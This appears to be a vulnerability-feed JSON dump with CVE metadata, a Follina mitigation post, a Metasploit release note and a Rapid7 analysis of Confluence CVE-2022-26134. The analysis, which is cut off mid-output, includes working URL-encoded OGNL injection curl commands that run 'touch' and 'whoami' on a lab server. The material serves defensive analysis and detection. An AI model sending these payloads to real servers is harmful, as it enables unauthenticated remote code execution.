"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-39793", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39793"], "modified": "2022-03-16T00:00:00", "id": "AKB:CC573E3E-6D5A-41AC-B91C-D1B70E18674F", "href": "https://attackerkb.com/topics/MjXft2mOzN/cve-2021-39793", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T05:14:59", "description": "A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.2 and iPadOS 15.2. An application may be able to execute arbitrary code with kernel privileges.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-30983", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30983"], "modified": "2022-01-10T00:00:00", "id": "AKB:12E53A37-65EB-4DDE-B8B5-4725EB276697", "href": "https://attackerkb.com/topics/pIW8qzO7iM/cve-2021-30983", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-11T23:29:38", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\n\n \n**Recent assessments:** \n \n**noraj** at April 15, 2023 7:34pm UTC reported:\n\nIt\u2019s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment.\n\n**jbaines-r7** at June 03, 2022 7:21pm UTC reported:\n\nIt\u2019s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-07-13T00:00:00", "id": "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "href": "https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T14:46:17", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \n**Obligado1** at May 03, 2022 7:06am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-03-18T00:00:00", "id": "AKB:12497ECD-6565-46DB-AD65-2F25827C7711", "href": "https://attackerkb.com/topics/82P5tenpQJ/cve-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-25T08:25:28", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-22587", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-18T00:00:00", "id": "AKB:F7DBB7CA-A582-4BC6-87C3-ACA4DBC4F58B", "href": "https://attackerkb.com/topics/ZFSs2HwdT4/cve-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T11:16:11", "description": "Windows LSA Spoofing Vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-10T00:00:00", "type": "attackerkb", "title": "CVE-2022-26925", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26925"], "modified": "2022-05-10T00:00:00", "id": "AKB:C3852904-E628-40EE-9AD4-445FC1899CF7", "href": "https://attackerkb.com/topics/vfyTk7fBGp/cve-2022-26925", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-01T02:19:45", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-30551", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-06-18T00:00:00", "id": "AKB:732A3017-A62C-4347-9709-9B8790F47FA1", "href": "https://attackerkb.com/topics/V4ywqx3Gej/cve-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-15T11:30:00", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG &gt; User Management &gt; User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "pentestpartners": [{"lastseen": "2022-07-13T15:54:57", "description": "\n\n_Disclaimer: I know this isn\u2019t a unique post on the subject, and that many other outlets are covering it, but this zero-day is so serious that it needs as much coverage as possible. It simply needs shouting about._\n\n**Updated 06/06/2022 following advice from Microsoft&#x27;s [@reybango](<https://twitter.com/reybango>).**\n\nThe vulnerability was reported to Microsoft by Shadow Chaser Group member [@CrazymanArmy](<https://twitter.com/crazymanarmy>).\n\n### What is it?\n\nIt exists in Microsoft Windows Support Diagnostic Tool (MSDT), enabling remote code execution. It\u2019s been assigned a [CVE](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190>) and Microsoft provide details here [CVE-2022-30190](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\nMicrosoft says:\n\n\n\nA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights.\n\n\n\nPut more simply; it makes Arbitrary Code Execution attacks possible when previewing or opening documents.\n\n### How do I deal with it?\n\nThere are two protocol handlers that need to be unregistered: **ms-msdt** and **search-ms**. \n\n\n### ms-msdt\n\nMicrosoft were quick to publish a workaround to prevent attacks that exploit the vulnerability: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>\n\nThe advice in that post is to disable the MSDT URL Protocol:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201c\n 3. Execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n### search-ms\n\n[@hackerfantastic](<https://twitter.com/hackerfantastic>) published advice [here](<https://twitter.com/hackerfantastic/status/1531793396423176193>). He said &quot;Note that this is not CVE-2022-30190 but uses the same OLEObject vector as CVE-2021-40444 and CVE-2022-30190, however as it requires additional user interaction and an outbound UNC connection the CVSS risk score is reduced. It is also currently unpatched but mitigation steps work&quot;.\n\nThe steps are:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command \u201creg export HKEY_CLASSES_ROOT\\search-ms filename\u201c\n 3. Execute command \u201creg delete HKEY_CLASSES_ROOT\\search-ms /f\u201d.\n\nAs with all workarounds it\u2019s on you to vet and investigate before deploying them.\n\nThere\u2019s more detail from the [nao_sec](<https://twitter.com/nao_sec>) cyber security research team [here](<https://twitter.com/nao_sec/status/1530196847679401984>).\n\n\n\nSANS have produced an analysis and remediation video [here](<https://www.youtube.com/watch?v=vHW_hb2m_pw>).\n\n * 19:20 Mitigations\n * 27:50 Detecting\n\n### Why is it called Follina?\n\nHere&#x27;s [why](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>), thanks [@GossiTheDog](<https://twitter.com/GossiTheDog>)!\n\nThe post [Follina 0day exploit. Malicious code execution in Office docs](<https://www.pentestpartners.com/security-blog/follina-0day-exploit-malicious-code-execution-in-office-docs/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T05:38:30", "type": "pentestpartners", "title": "Follina 0day exploit. Malicious code execution in Office docs", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-01T05:38:30", "id": "PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93", "href": "https://www.pentestpartners.com/security-blog/follina-0day-exploit-malicious-code-execution-in-office-docs/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-06-14T17:04:53", "description": "## A Confluence of High-Profile Modules\n\n\n\nThis release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. Both have been all over the news, and we\u2019re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you\u2019d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>))and Windows CVE-2022-30190 ([AttackKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).\n\n## Metasploit 6.2\n\nWhile we release new content weekly (or in real-time if you are using github), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>)\n\n## New module content (2)\n\n * [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) \\- This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n * [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA S\u00e9bastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) \\- This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.\n\n## Enhancements and features (2)\n\n * [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) \\- The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.\n * [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) \\- The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.\n\n## Bugs fixed (4)\n\n * [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) \\- A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in last 16 bits of link-local address and removing them.\n * [#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.\n * [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) \\- The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.\n * [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- : \nThis PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)\n * [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T01:56:25", "description": "\n\nOn June 2, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability was unpatched when it was published on June 2. As of June 3, both patches and a temporary workaround are available.\n\nCVE-2022-26134 is being actively and widely [exploited in the wild](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). Rapid7's Managed Detection and Response (MDR) team has observed an uptick of likely exploitation of CVE-2022-26134 in customer environments as of June 3.\n\nAll supported versions of Confluence Server and Data Center are affected. \nAtlassian updated their advisory on June 3 to reflect that it's likely that **all versions** (whether supported or not) of Confluence Server and Data Center are affected, but they have yet to confirm the earliest affected version. Organizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately.\n\n## Technical analysis\n\nCVE-2022-26314 is an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server (typically the `confluence` user on Linux installations). Given the nature of the vulnerability, [internet-facing](<https://www.shodan.io/search?query=X-Confluence-Request-Time>) Confluence servers are at very high risk.\n\nLast year, Atlassian Confluence suffered from a different unauthenticated and remote OGNL injection, [CVE-2021-26084](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>). Organizations maintaining an internet-facing Confluence or Data Server may want to consider permanently moving access behind a VPN.\n\n### The vulnerability\n\nAs stated, the vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc) or invalid (e.g. \u201cBALH\u201d). In its simplest form, an exploit abusing the vulnerability looks like this:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/\n \n\nAbove, the exploit is URL-encoded. The exploit encompasses everything from the start of the content location to the last instance of `/`. Decoded it looks like this:\n \n \n ${@java.lang.Runtime@getRuntime().exec(\"touch /tmp/r7\")}\n \n\nEvidence of exploitation can typically be found in access logs because the exploit is stored in the HTTP request field. For example, on our test Confluence (version 7.13.6 LTS), the log file `/opt/atlassian/confluence/logs/conf_access_log.<yyyy-mm-dd>.log` contains the following entry after exploitation:\n \n \n [02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0\n \n\nScanning for vulnerable servers is easy because exploitation allows attackers to force the server to send command output in the HTTP response. For example, the following request will return the response of `whoami` in the attacker-created `X-Cmd-Response` HTTP field (credit to Rapid7\u2019s Brandon Turner for the exploit below). Note the `X-Cmd-Response: confluence` line in the HTTP response:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\n * Trying 10.0.0.28:8090...\n * TCP_NODELAY set\n * Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)\n > GET 